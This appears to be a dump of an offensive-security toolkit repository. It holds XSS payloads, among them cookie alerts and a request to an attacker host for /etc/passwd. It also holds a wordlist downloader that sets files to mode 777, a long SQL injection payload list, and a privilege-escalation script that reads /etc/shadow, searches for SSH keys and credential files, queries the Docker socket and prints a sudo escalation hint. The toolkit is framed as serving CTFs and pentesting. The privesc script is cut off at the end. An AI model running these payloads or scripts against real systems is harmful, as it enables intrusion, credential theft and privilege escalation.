116 | ?s="onerror="alert%261par;1337%26rpar;"
117 | ?s="onerror="alert`1337`"
118 | <img src="xxx" onerror="document.write('\<iframe src=file:///etc/passwd>\</iframe>')"/>
119 | <link rel=attachment href="file:///etc/passwd">
120 | <iframe src="http://attacker-ip/test.php?file=/etc/passwd">\</iframe>
121 | <IMG sRC=X onerror=jaVaScRipT:alert`xss`>
122 | %22%3E%3CIMG%20sRC=X%20onerror=jaVaScRipT:alert`xss`%3E
123 | <svg  xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)"/>
124 | <svg><style> <script>alert(1)</script> </style></svg>
125 | <math><style> <img src onerror=alert(2)> </style></math>
126 | <script>window.location.assign('https://secure.eicar.org/eicar_com.zip')</script>
127 | <body style="background-color:red">
128 | <body style="background-color:red !important;">
129 | <body onload=window.location.assign('https://www.google.com')>
130 | alert(123)
131 | alert("test")
132 | alert(document.cookie)
133 | alert(document.domain)
134 | confirm(123)
135 | confirm("test")
136 | confirm(document.cookie)
137 | confirm(document.domain)
138 | prompt(123)
139 | prompt("test")
140 | prompt(document.cookie)
141 | prompt(document.domain)
142 | 


--------------------------------------------------------------------------------
/scripts/get-wordlists.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | 
  3 | # Colors
  4 | RED='\033[0;31m'
  5 | GREEN='\033[0;32m'
  6 | YELLOW='\033[1;33m'
  7 | BLUE='\033[0;34m'
  8 | MAGENTA='\033[0;35m'
  9 | CYAN='\033[0;36m'
 10 | RESET='\033[0m'
 11 | BOLD='\033[1m'
 12 | 
 13 | WORDLIST_DIR="./wordlists"
 14 | TEMP_DIR="/tmp/wordlists_temp"
 15 | 
 16 | setup_directories() {
 17 |     echo -e "${BLUE}[*] Setting up directories...${RESET}"
 18 |     mkdir -p "$WORDLIST_DIR"/{dns,directories,passwords,usernames,web-content,payloads,custom}
 19 |     mkdir -p "$TEMP_DIR"
 20 | }
 21 | 
 22 | check_requirements() {
 23 |     local tools=("wget" "git" "unzip" "tar" "gzip")
 24 | 
 25 |     echo -e "${BLUE}[*] Checking requirements...${RESET}"
 26 |     for tool in "${tools[@]}"; do
 27 |         if ! command -v "$tool" &> /dev/null; then
 28 |             echo -e "${RED}[-] $tool is not installed. Installing...${RESET}"
 29 |             if command -v apt &> /dev/null; then
 30 |                 sudo apt update && sudo apt install -y "$tool"
 31 |             elif command -v dnf &> /dev/null; then
 32 |                 sudo dnf install -y "$tool"
 33 |             elif command -v yum &> /dev/null; then
 34 |                 sudo yum install -y "$tool"
 35 |             elif command -v pacman &> /dev/null; then
 36 |                 sudo pacman -Sy --noconfirm "$tool"
 37 |             else
 38 |                 echo -e "${RED}[-] Could not install $tool. Please install it manually.${RESET}"
 39 |                 exit 1
 40 |             fi
 41 |         fi
 42 |     done
 43 | }
 44 | 
 45 | download_seclists() {
 46 |     echo -e "${BLUE}[*] Downloading SecLists...${RESET}"
 47 | 
 48 |     if [ ! -d "$TEMP_DIR/SecLists" ]; then
 49 |         git clone --depth 1 https://github.com/danielmiessler/SecLists.git "$TEMP_DIR/SecLists"
 50 |     fi
 51 | 
 52 |     echo -e "${GREEN}[+] Organizing SecLists files...${RESET}"
 53 | 
 54 |     # DNS
 55 |     cp "$TEMP_DIR/SecLists/Discovery/DNS/"*.txt "$WORDLIST_DIR/dns/"
 56 | 
 57 |     # Directories
 58 |     cp "$TEMP_DIR/SecLists/Discovery/Web-Content/"*.txt "$WORDLIST_DIR/directories/"
 59 | 
 60 |     # Passwords
 61 |     cp "$TEMP_DIR/SecLists/Passwords/Common-Credentials/"*.txt "$WORDLIST_DIR/passwords/"
 62 | 
 63 |     # Usernames
 64 |     cp "$TEMP_DIR/SecLists/Usernames/"*.txt "$WORDLIST_DIR/usernames/"
 65 | }
 66 | 
 67 | download_fuzzdb() {
 68 |     echo -e "${BLUE}[*] Downloading FuzzDB...${RESET}"
 69 | 
 70 |     if [ ! -d "$TEMP_DIR/fuzzdb" ]; then
 71 |         git clone --depth 1 https://github.com/fuzzdb-project/fuzzdb.git "$TEMP_DIR/fuzzdb"
 72 |     fi
 73 | 
 74 |     # Copy relevant files
 75 |     echo -e "${GREEN}[+] Organizing FuzzDB files...${RESET}"
 76 |     cp -r "$TEMP_DIR/fuzzdb/attack" "$WORDLIST_DIR/payloads/"
 77 |     cp -r "$TEMP_DIR/fuzzdb/discovery" "$WORDLIST_DIR/web-content/"
 78 | }
 79 | 
 80 | download_custom_wordlists() {
 81 |     echo -e "${BLUE}[*] Downloading additional wordlists...${RESET}"
 82 | 
 83 |     if [ ! -f "$WORDLIST_DIR/passwords/rockyou.txt" ]; then
 84 |         echo -e "${YELLOW}[?] Do you want to download the rockyou.txt password list? (y/n)${RESET}"
 85 |         read -r response
 86 |         if [[ "$response" =~ ^[Yy]$ ]]; then
 87 |             wget -c https://github.com/praetorian-inc/Hob0Rules/raw/master/wordlists/rockyou.txt.gz -O "$TEMP_DIR/rockyou.txt.gz"
 88 |             gunzip -c "$TEMP_DIR/rockyou.txt.gz" > "$WORDLIST_DIR/passwords/rockyou.txt"
 89 |         fi
 90 |     fi
 91 | 
 92 |     # Common Web Paths
 93 |     wget -q https://raw.githubusercontent.com/maurosoria/dirsearch/master/db/dicc.txt -O "$WORDLIST_DIR/directories/dirsearch-common.txt"
 94 | 
 95 |     # Common Subdomains
 96 |     wget -q https://raw.githubusercontent.com/rbsec/dnscan/master/subdomains.txt -O "$WORDLIST_DIR/dns/common-subdomains.txt"
 97 | }
 98 | 
 99 | organize_wordlists() {
100 |     echo -e "${BLUE}[*] Organizing and cleaning up...${RESET}"
101 | 
102 |     find "$WORDLIST_DIR" -type f -name "*.txt" -exec sort -u {} -o {} \;
103 | 
104 |     cat > "$WORDLIST_DIR/README.md" << EOF
105 | # Wordlists Directory Structure
106 | 
107 | - dns/: DNS and subdomain wordlists
108 | - directories/: Web directory and file wordlists
109 | - passwords/: Password lists and common credentials
110 | - usernames/: Username lists
111 | - web-content/: Web content discovery lists
112 | - payloads/: Various payload lists for testing
113 | - custom/: Your custom wordlists
114 | 
115 | Generated on: $(date)
116 | EOF
117 | 
118 |     # Set permissions
119 |     chmod -R 777 "$WORDLIST_DIR"/*
120 |     chmod 777 "$WORDLIST_DIR"
121 | }
122 | 
123 | show_stats() {
124 |     echo -e "\n${MAGENTA}[*] Wordlist Statistics:${RESET}"
125 |     echo -e "${CYAN}----------------------------------------${RESET}"
126 |     echo -e "${GREEN}Total Files: $(find "$WORDLIST_DIR" -type f | wc -l)${RESET}"
127 |     echo -e "\n${YELLOW}Files per category:${RESET}"
128 |     for dir in dns directories passwords usernames web-content payloads custom; do
129 |         count=$(find "$WORDLIST_DIR/$dir" -type f | wc -l)
130 |         echo -e "${BLUE}$dir: ${GREEN}$count files${RESET}"
131 |     done
132 |     echo -e "${CYAN}----------------------------------------${RESET}"
133 | }
134 | 
135 | # Clean up temporary files
136 | cleanup() {
137 |     echo -e "${BLUE}[*] Cleaning up temporary files...${RESET}"
138 |     rm -rf "$TEMP_DIR"
139 | }
140 | 
141 | main() {
142 |     echo -e "${MAGENTA}╔═══════════════════════════════════╗${RESET}"
143 |     echo -e "${MAGENTA}║    ${CYAN}${BOLD}Sh0zack Wordlist Downloader    ${MAGENTA}║${RESET}"
144 |     echo -e "${MAGENTA}╚═══════════════════════════════════╝${RESET}"
145 |     echo
146 | 
147 |     check_requirements
148 |     setup_directories
149 | 
150 |     # Menu
151 |     while true; do
152 |         echo -e "\n${YELLOW}Select wordlists to download:${RESET}"
153 |         echo -e "${GREEN}1. All wordlists (recommended)${RESET}"
154 |         echo -e "${GREEN}2. Only DNS/Subdomain lists${RESET}"
155 |         echo -e "${GREEN}3. Only Directory bruteforce lists${RESET}"
156 |         echo -e "${GREEN}4. Only Password lists${RESET}"
157 |         echo -e "${GREEN}5. Only Custom lists${RESET}"
158 |         echo -e "${RED}6. Exit${RESET}"
159 | 
160 |         read -p "Enter your choice (1-6): " choice
161 | 
162 |         case $choice in
163 |             1)
164 |                 download_seclists
165 |                 download_fuzzdb
166 |                 download_custom_wordlists
167 |                 break
168 |                 ;;
169 |             2)
170 |                 cp "$TEMP_DIR/SecLists/Discovery/DNS/"*.txt "$WORDLIST_DIR/dns/"
171 |                 break
172 |                 ;;
173 |             3)
174 |                 cp "$TEMP_DIR/SecLists/Discovery/Web-Content/"*.txt "$WORDLIST_DIR/directories/"
175 |                 break
176 |                 ;;
177 |             4)
178 |                 cp "$TEMP_DIR/SecLists/Passwords/Common-Credentials/"*.txt "$WORDLIST_DIR/passwords/"
179 |                 download_custom_wordlists
180 |                 break
181 |                 ;;
182 |             5)
183 |                 download_custom_wordlists
184 |                 break
185 |                 ;;
186 |             6)
187 |                 echo -e "${RED}Exiting...${RESET}"
188 |                 exit 0
189 |                 ;;
190 |             *)
191 |                 echo -e "${RED}Invalid choice. Please try again.${RESET}"
192 |                 ;;
193 |         esac
194 |     done
195 | 
196 |     organize_wordlists
197 |     show_stats
198 |     cleanup
199 | 
200 |     echo -e "\n${GREEN}[+] Wordlist download and organization complete!${RESET}"
201 |     echo -e "${YELLOW}[*] Wordlists are located in: ${BLUE}$WORDLIST_DIR${RESET}"
202 | }
203 | 
204 | # Run main function
205 | main
206 | 
207 | # Error handling
208 | trap 'echo -e "${RED}[-] An error occurred. Cleaning up...${RESET}"; cleanup; exit 1' ERR
209 | 


--------------------------------------------------------------------------------
/payloads/sqli/sql.txt:
--------------------------------------------------------------------------------
  1 | '
  2 | ''
  3 | `
  4 | ``
  5 | ,
  6 | "
  7 | ""
  8 | /
  9 | //
 10 | \
 11 | \\
 12 | ;
 13 | ' or "
 14 | -- or # 
 15 | ' OR '1
 16 | ' OR 1 -- -
 17 | " OR "" = "
 18 | " OR 1 = 1 -- -
 19 | ' OR '' = '
 20 | '='
 21 | 'LIKE'
 22 | '=0--+
 23 |  OR 1=1
 24 | ' OR 'x'='x
 25 | ' AND id IS NULL; --
 26 | '''''''''''''UNION SELECT '2
 27 | %00
 28 | /*…*/ 
 29 | +		addition, concatenate (or space in url)
 30 | ||		(double pipe) concatenate
 31 | %		wildcard attribute indicator
 32 | @variable	local variable
 33 | @@variable	global variable
 34 | AND 1
 35 | AND 0
 36 | AND true
 37 | AND false
 38 | 1-false
 39 | 1-true
 40 | 1*56
 41 | -2
 42 | 1' ORDER BY 1--+
 43 | 1' ORDER BY 2--+
 44 | 1' ORDER BY 3--+
 45 | 1' ORDER BY 1,2--+
 46 | 1' ORDER BY 1,2,3--+
 47 | 1' GROUP BY 1,2,--+
 48 | 1' GROUP BY 1,2,3--+
 49 | ' GROUP BY columnnames having 1=1 --
 50 | -1' UNION SELECT 1,2,3--+
 51 | ' UNION SELECT sum(columnname ) from tablename --
 52 | -1 UNION SELECT 1 INTO @,@
 53 | -1 UNION SELECT 1 INTO @,@,@
 54 | 1 AND (SELECT * FROM Users) = 1	
 55 | ' AND MID(VERSION(),1,1) = '5';
 56 | ' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
 57 | ,(select * from (select(sleep(10)))a)
 58 | %2c(select%20*%20from%20(select(sleep(10)))a)
 59 | ';WAITFOR DELAY '0:0:30'--
 60 |  OR 1=1
 61 |  OR 1=0
 62 |  OR x=x
 63 |  OR x=y
 64 |  OR 1=1#
 65 |  OR 1=0#
 66 |  OR x=x#
 67 |  OR x=y#
 68 |  OR 1=1-- 
 69 |  OR 1=0-- 
 70 |  OR x=x-- 
 71 |  OR x=y-- 
 72 |  OR 3409=3409 AND ('pytW' LIKE 'pytW
 73 |  OR 3409=3409 AND ('pytW' LIKE 'pytY
 74 |  HAVING 1=1
 75 |  HAVING 1=0
 76 |  HAVING 1=1#
 77 |  HAVING 1=0#
 78 |  HAVING 1=1-- 
 79 |  HAVING 1=0-- 
 80 |  AND 1=1
 81 |  AND 1=0
 82 |  AND 1=1-- 
 83 |  AND 1=0-- 
 84 |  AND 1=1#
 85 |  AND 1=0#
 86 |  AND 1=1 AND '%'='
 87 |  AND 1=0 AND '%'='
 88 |  AND 1083=1083 AND (1427=1427
 89 |  AND 7506=9091 AND (5913=5913
 90 |  AND 1083=1083 AND ('1427=1427
 91 |  AND 7506=9091 AND ('5913=5913
 92 |  AND 7300=7300 AND 'pKlZ'='pKlZ
 93 |  AND 7300=7300 AND 'pKlZ'='pKlY
 94 |  AND 7300=7300 AND ('pKlZ'='pKlZ
 95 |  AND 7300=7300 AND ('pKlZ'='pKlY
 96 |  AS INJECTX WHERE 1=1 AND 1=1
 97 |  AS INJECTX WHERE 1=1 AND 1=0
 98 |  AS INJECTX WHERE 1=1 AND 1=1#
 99 |  AS INJECTX WHERE 1=1 AND 1=0#
100 |  AS INJECTX WHERE 1=1 AND 1=1--
101 |  AS INJECTX WHERE 1=1 AND 1=0--
102 |  WHERE 1=1 AND 1=1
103 |  WHERE 1=1 AND 1=0
104 |  WHERE 1=1 AND 1=1#
105 |  WHERE 1=1 AND 1=0#
106 |  WHERE 1=1 AND 1=1--
107 |  WHERE 1=1 AND 1=0--
108 | ' UNION SELECT NULL--
109 | ' UNION SELECT NULL,NULL--
110 | ' UNION SELECT NULL,NULL,NULL--
111 | ' UNION SELECT NULL,NULL,NULL,NULL--
112 | ' UNION SELECT NULL,NULL,NULL,NULL,NULL--
113 |  ORDER BY 1-- 
114 |  ORDER BY 2-- 
115 |  ORDER BY 3-- 
116 |  ORDER BY 4-- 
117 |  ORDER BY 5-- 
118 |  ORDER BY 6-- 
119 |  ORDER BY 7-- 
120 |  ORDER BY 8-- 
121 |  ORDER BY 9-- 
122 |  ORDER BY 10-- 
123 |  ORDER BY 11-- 
124 |  ORDER BY 12-- 
125 |  ORDER BY 13-- 
126 |  ORDER BY 14-- 
127 |  ORDER BY 15-- 
128 |  ORDER BY 16-- 
129 |  ORDER BY 17-- 
130 |  ORDER BY 18-- 
131 |  ORDER BY 19-- 
132 |  ORDER BY 20-- 
133 |  ORDER BY 21-- 
134 |  ORDER BY 22-- 
135 |  ORDER BY 23-- 
136 |  ORDER BY 24-- 
137 |  ORDER BY 25-- 
138 |  ORDER BY 26-- 
139 |  ORDER BY 27-- 
140 |  ORDER BY 28-- 
141 |  ORDER BY 29-- 
142 |  ORDER BY 30-- 
143 |  ORDER BY 31337-- 
144 |  ORDER BY 1# 
145 |  ORDER BY 2# 
146 |  ORDER BY 3# 
147 |  ORDER BY 4# 
148 |  ORDER BY 5# 
149 |  ORDER BY 6# 
150 |  ORDER BY 7# 
151 |  ORDER BY 8# 
152 |  ORDER BY 9# 
153 |  ORDER BY 10# 
154 |  ORDER BY 11# 
155 |  ORDER BY 12# 
156 |  ORDER BY 13# 
157 |  ORDER BY 14# 
158 |  ORDER BY 15# 
159 |  ORDER BY 16# 
160 |  ORDER BY 17# 
161 |  ORDER BY 18# 
162 |  ORDER BY 19# 
163 |  ORDER BY 20# 
164 |  ORDER BY 21# 
165 |  ORDER BY 22# 
166 |  ORDER BY 23# 
167 |  ORDER BY 24# 
168 |  ORDER BY 25# 
169 |  ORDER BY 26# 
170 |  ORDER BY 27# 
171 |  ORDER BY 28# 
172 |  ORDER BY 29# 
173 |  ORDER BY 30#
174 |  ORDER BY 31337#
175 |  ORDER BY 1 
176 |  ORDER BY 2 
177 |  ORDER BY 3 
178 |  ORDER BY 4 
179 |  ORDER BY 5 
180 |  ORDER BY 6 
181 |  ORDER BY 7 
182 |  ORDER BY 8 
183 |  ORDER BY 9 
184 |  ORDER BY 10 
185 |  ORDER BY 11 
186 |  ORDER BY 12 
187 |  ORDER BY 13 
188 |  ORDER BY 14 
189 |  ORDER BY 15 
190 |  ORDER BY 16 
191 |  ORDER BY 17 
192 |  ORDER BY 18 
193 |  ORDER BY 19 
194 |  ORDER BY 20 
195 |  ORDER BY 21 
196 |  ORDER BY 22 
197 |  ORDER BY 23 
198 |  ORDER BY 24 
199 |  ORDER BY 25 
200 |  ORDER BY 26 
201 |  ORDER BY 27 
202 |  ORDER BY 28 
203 |  ORDER BY 29 
204 |  ORDER BY 30 
205 |  ORDER BY 31337 
206 |  RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
207 |  RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
208 | IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--
209 | IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--
210 | %' AND 8310=8310 AND '%'='
211 | %' AND 8310=8311 AND '%'='
212 |  and (select substring(@@version,1,1))='X'
213 |  and (select substring(@@version,1,1))='M'
214 |  and (select substring(@@version,2,1))='i'
215 |  and (select substring(@@version,2,1))='y'
216 |  and (select substring(@@version,3,1))='c'
217 |  and (select substring(@@version,3,1))='S'
218 |  and (select substring(@@version,3,1))='X'
219 | sleep(5)#
220 | 1 or sleep(5)#
221 | " or sleep(5)#
222 | ' or sleep(5)#
223 | " or sleep(5)="
224 | ' or sleep(5)='
225 | 1) or sleep(5)#
226 | ") or sleep(5)="
227 | ') or sleep(5)='
228 | 1)) or sleep(5)#
229 | ")) or sleep(5)="
230 | ')) or sleep(5)='
231 | ;waitfor delay '0:0:5'--
232 | );waitfor delay '0:0:5'--
233 | ';waitfor delay '0:0:5'--
234 | ";waitfor delay '0:0:5'--
235 | ');waitfor delay '0:0:5'--
236 | ");waitfor delay '0:0:5'--
237 | ));waitfor delay '0:0:5'--
238 | '));waitfor delay '0:0:5'--
239 | "));waitfor delay '0:0:5'--
240 | benchmark(10000000,MD5(1))#
241 | 1 or benchmark(10000000,MD5(1))#
242 | " or benchmark(10000000,MD5(1))#
243 | ' or benchmark(10000000,MD5(1))#
244 | 1) or benchmark(10000000,MD5(1))#
245 | ") or benchmark(10000000,MD5(1))#
246 | ') or benchmark(10000000,MD5(1))#
247 | 1)) or benchmark(10000000,MD5(1))#
248 | ")) or benchmark(10000000,MD5(1))#
249 | ')) or benchmark(10000000,MD5(1))#
250 | pg_sleep(5)--
251 | 1 or pg_sleep(5)--
252 | " or pg_sleep(5)--
253 | ' or pg_sleep(5)--
254 | 1) or pg_sleep(5)--
255 | ") or pg_sleep(5)--
256 | ') or pg_sleep(5)--
257 | 1)) or pg_sleep(5)--
258 | ")) or pg_sleep(5)--
259 | ')) or pg_sleep(5)--
260 | AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
261 | AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
262 | AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
263 | AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
264 | AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
265 | SLEEP(5)#
266 | SLEEP(5)--
267 | SLEEP(5)="
268 | SLEEP(5)='
269 | or SLEEP(5)
270 | or SLEEP(5)#
271 | or SLEEP(5)--
272 | or SLEEP(5)="
273 | or SLEEP(5)='
274 | waitfor delay '00:00:05'
275 | waitfor delay '00:00:05'--
276 | waitfor delay '00:00:05'#
277 | benchmark(50000000,MD5(1))
278 | benchmark(50000000,MD5(1))--
279 | benchmark(50000000,MD5(1))#
280 | or benchmark(50000000,MD5(1))
281 | or benchmark(50000000,MD5(1))--
282 | or benchmark(50000000,MD5(1))#
283 | pg_SLEEP(5)
284 | pg_SLEEP(5)--
285 | pg_SLEEP(5)#
286 | or pg_SLEEP(5)
287 | or pg_SLEEP(5)--
288 | or pg_SLEEP(5)#
289 | '\"
290 | AnD SLEEP(5)
291 | AnD SLEEP(5)--
292 | AnD SLEEP(5)#
293 | &&SLEEP(5)
294 | &&SLEEP(5)--
295 | &&SLEEP(5)#
296 | ' AnD SLEEP(5) ANd '1
297 | '&&SLEEP(5)&&'1
298 | ORDER BY SLEEP(5)
299 | ORDER BY SLEEP(5)--
300 | ORDER BY SLEEP(5)#
301 | (SELECT * FROM (SELECT(SLEEP(5)))ecMj)
302 | (SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
303 | (SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
304 | +benchmark(3200,SHA1(1))+'
305 | + SLEEP(10) + '
306 | RANDOMBLOB(500000000/2)
307 | AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
308 | OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
309 | RANDOMBLOB(1000000000/2)
310 | AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
311 | OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
312 | SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/
313 | '|| pg_sleep(10) --+
314 | 


--------------------------------------------------------------------------------
/tools/privesc.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | 
  3 | ## privsec utility part of Shozack tool made by Sh0z3n to assist solving boxes on TryHackMe | Hack The Box , CTFs and real-life pentesting 
  4 | 
  5 | RED=$(tput setaf 1)
  6 | GREEN=$(tput setaf 2)
  7 | YELLOW=$(tput setaf 3)
  8 | BLUE=$(tput setaf 4)
  9 | PURPLE=$(tput setaf 5)
 10 | BOLD=$(tput bold)
 11 | RESET=$(tput sgr0)
 12 | 
 13 | # Functions to print in colors
 14 | red() {
 15 |     echo -e "${BOLD}${RED}$1${RESET}"
 16 | }
 17 | green() {
 18 |     echo -e "${BOLD}${GREEN}$1${RESET}"
 19 | }
 20 | yellow() {
 21 |     echo -e "${YELLOW}$1${RESET}"
 22 | }
 23 | blue() {
 24 |     echo -e "${BOLD}${BLUE}$1${RESET}"
 25 | }
 26 | purple() {
 27 |     echo -e "${BOLD}${PURPLE}$1${RESET}"
 28 | }
 29 | 
 30 | # Helper function to add spacing
 31 | spacer() {
 32 |     echo ""
 33 |     echo "---------------------------------------------------------------------------------"
 34 |     echo ""
 35 | }
 36 | 
 37 | # MACHINE DETAILS
 38 | spacer
 39 | printf "\n%*s\n\n" $((($(tput cols) + 14) / 2)) "$(red "MACHINE DETAILS")"
 40 | 
 41 | blue "[+] Host Details"
 42 | green "Hostname: $(hostname)"
 43 | echo " "
 44 | green "Date of scan: $(date)"
 45 | purple "Operating System Details: $(cat /etc/os-release 2>/dev/null)"
 46 | echo " "
 47 | green "Extra Info: $(cat /etc/issue)"
 48 | echo " "
 49 | green "Kernel Version: $(cat /proc/version || uname -r)"
 50 | 
 51 | purple "PATH: $PATH"
 52 | 
 53 | echo "Environment Variables:"
 54 | env || set 2>/dev/null
 55 | 
 56 | sudo_version=$(sudo -V | grep -oP 'Sudo version \K[0-9.]+')
 57 | target_version="1.25"
 58 | echo "Sudo version: $sudo_version"
 59 | if [[ "$sudo_version" < "$target_version" ]]; then
 60 |     red " Vulnerable to CVE-2019-14287"
 61 |     purple " Hint to Escalate: sudo -u#-1 /bin/bash"
 62 | fi
 63 | green "System stats: $(df -h || lsblk)"
 64 | green "CPU info: $(lscpu)"
 65 | green "Printers info:"
 66 | lpstat -a 2>/dev/null
 67 | 
 68 | sleep 0.1
 69 | 
 70 | # USER DETAILS
 71 | spacer
 72 | printf "\n%*s\n\n" $((($(tput cols) + 13) / 2)) "$(red "USER DETAILS")"
 73 | 
 74 | blue "[+] User Details"
 75 | blue "Current User Info: $(id || (whoami && groups) 2>/dev/null)"
 76 | if [ "$(sudo -n true 2>/dev/null)" ]; then
 77 |     red "Is it sudo? Yes"
 78 | else
 79 |     green "Is it sudo? No"
 80 | fi
 81 | 
 82 | green "All users: "
 83 | yellow "$(for i in $(cut -d":" -f1 /etc/passwd 2>/dev/null); do id $i; done 2>/dev/null | sort)"
 84 | echo ""
 85 | 
 86 | red "Users passwords: $(grep -E '^[^:]+:\$' /etc/shadow | awk -F: '{print $1 ":" $2}')"
 87 | 
 88 | green "Users with shells:"
 89 | cat /etc/passwd | grep "sh$"
 90 | red "Sudo Users"
 91 | awk -F: '($3 == "0") {print}' /etc/passwd
 92 | green "Current logged users: $(w)"
 93 | green "Last log of each user: $(lastlog)"
 94 | 
 95 | purple "Current user PGP keys"
 96 | gpg --list-keys 2>/dev/null
 97 | echo "PATH: $PATH"
 98 | 
 99 | red "Shadow file content: "
100 | cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db /etc/security/opasswd 2>/dev/null
101 | 
102 | # Adding some delay for animation effect
103 | sleep 1
104 | 
105 | # CONFIGURATION DETAILS
106 | spacer
107 | printf "\n%*s\n\n" $((($(tput cols) + 21) / 2)) "$(red "CONFIGURATION DETAILS")"
108 | 
109 | red "[+] Security Measures"
110 | dmesg 2>/dev/null | grep "signature"
111 | (grep "exec-shield" /etc/sysctl.conf || echo "Not found Execshield")
112 | (which paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo "Not found PaX")
113 | ((uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo "Not found grsecurity")
114 | 
115 | echo "SELinux: $( (sestatus 2>/dev/null || echo "Not found sestatus"))"
116 | echo "ASLR: $(cat /proc/sys/kernel/randomize_va_space 2>/dev/null)"
117 | ls -l /etc/profile /etc/profile.d/
118 | 
119 | # Adding some delay for animation effect
120 | sleep 1
121 | 
122 | # FILE SYSTEM DETAILS
123 | spacer
124 | printf "\n%*s\n\n" $((($(tput cols) + 20) / 2)) "$(red "FILE SYSTEM DETAILS")"
125 | 
126 | purple "DRIVERS:"
127 | ls /dev 2>/dev/null | grep -i "sd"
128 | 
129 | green "Mounted filesystems:"
130 | cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null
131 | 
132 | purple "Check if any credentials in fstab:"
133 | grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null
134 | 
135 | red "Readable files:"
136 | echo ""
137 | red "SQLite DB files:"
138 | find / -name '*.db' -o -name '*.sqlite' -o -name '*.sqlite3' 2>/dev/null
139 | 
140 | purple "Files created in last 1 mins:"
141 | find / -type f -mmin -1 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" 2>/dev/null
142 | 
143 | blue "Hidden files:"
144 | find /home -type f -iname ".*" -ls 2>/dev/null
145 | echo " "
146 | red "Critical Files:"
147 | find / -type f \( -name "*_history" -o -name ".sudo_as_admin_successful" -o -name ".profile" -o -name "*bashrc" -o -name "httpd.conf" -o -name "*.plan" -o -name ".htpasswd" -o -name ".git-credentials" -o -name "*.rhosts" -o -name "hosts.equiv" -o -name "Dockerfile" -o -name "docker-compose.yml" -o -name "id_rsa" -o -name "id_rsa.pub" -o -name "id_dsa" -o -name "id_dsa.pub" -o -name "known_hosts" -o -name "authorized_keys" -o -name "config" -path "*/.ssh/*" \) 2>/dev/null
148 | echo ""
149 | red "Scripts / Binaries in the PATH:"
150 | for d in $(echo $PATH | tr ":" "\n"); do find $d -name "*.sh" 2>/dev/null; done
151 | for d in $(echo $PATH | tr ":" "\n"); do find $d -type f -executable 2>/dev/null; done
152 | echo ""
153 | purple "Web files:"
154 | ls -alhR /var/www/ 2>/dev/null
155 | ls -alhR /srv/www/htdocs/ 2>/dev/null
156 | ls -alhR /usr/local/www/apache22/data/
157 | ls -alhR /opt/lampp/htdocs/ 2>/dev/null
158 | spacer
159 | green "Mail Files":
160 | 
161 | ls -alRh /var/mail
162 | spacer
163 | blue "Backups:"
164 | find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*backup*" -o -name "*.bak" -o -name "*.bck" -o -name "*.bk" \) 2>/dev/null
165 | 
166 | purple "Debugger:"
167 | (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/")
168 | spacer
169 | red "Binaries can be Executed as Root: $(sudo -l | grep -A999 'ALL')"
170 | spacer
171 | red "Suid Binaries: $(find / -perm -4000 2>/dev/null)"
172 | 
173 | # PROCESS DETAILS
174 | printf "\n%*s\n\n" $((($(tput cols) + 14) / 2)) "$(red "PROCESS DETAILS")"
175 | 
176 | echo " [+] Process Details "
177 | cat /etc/crontab
178 | ps axjf
179 | red "Credentials inside the memory: $(ps -ef | grep "authenticator")"
180 | 
181 | 
182 | # CRONJOBS
183 | spacer
184 | printf "\n%*s\n\n" $((($(tput cols) + 7) / 2)) "$(red "CRONJOBS")"
185 | 
186 | purple "$(crontab -l)"
187 | ls -al /etc/cron* /etc/at*
188 | cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"
189 | systemctl list-timers | head
190 | 
191 | 
192 | # NETWORK DETAILS
193 | spacer
194 | printf "\n%*s\n\n" $((($(tput cols) + 15) / 2)) "$(red "NETWORK DETAILS")"
195 | 
196 | cat /etc/hostname /etc/hosts /etc/resolv.conf
197 | dnsdomainname
198 | spacer
199 | purple "TCP connections for both local and remotely: $(cat /proc/net/tcp)"
200 | echo "Unix Sockets: "
201 | netstat -a -p --unix
202 | curl -XGET --unix-socket /var/run/docker.sock http://localhost/images/json
203 | 
204 | cat /etc/inetd.conf /etc/xinetd.conf
205 | spacer
206 | green "Interfaces:"
207 | cat /etc/networks
208 | (ifconfig || ip a)
209 | 
210 | echo "Neighbours:"
211 | (arp -e || arp -a)
212 | (route || ip n)
213 | 
214 | echo "Iptables rules:"
